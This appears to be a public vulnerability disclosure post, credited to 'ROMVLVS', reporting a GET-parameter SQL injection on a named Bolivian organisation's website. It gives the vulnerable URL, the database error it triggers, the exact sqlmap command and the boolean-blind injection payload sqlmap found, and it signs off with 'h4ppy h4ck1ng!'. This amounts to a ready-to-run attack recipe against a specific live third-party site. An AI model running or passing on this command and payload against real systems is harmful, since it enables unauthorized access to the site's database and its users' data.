CATEC BOLIVIA | SQL Injection

2021.08.30

ROMVLVS (BY)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

--==[ Discovered by ROMVLVS ]==--

Website: www.catec.com.bo
Vulnerability: SQL Injection (Method GET)

Vulnerable Path: https://www.catec.com.bo/galeria.php?id=2%27
ERROR:  Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home2/cateccom/public_html/galeria.php on line 50

Using sqlmap: sqlmap --url https://www.catec.com.bo/galeria.php?id=2 
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 1247=1247 AND 'rgkL'='rgkL
---
[xx:xx:xx] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5

--==[ h4ppy h4ck1ng! ]==--

References:

https://pt.wikipedia.org/wiki/Inje%C3%A7%C3%A3o_de_SQL

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CATEC BOLIVIA | SQL Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.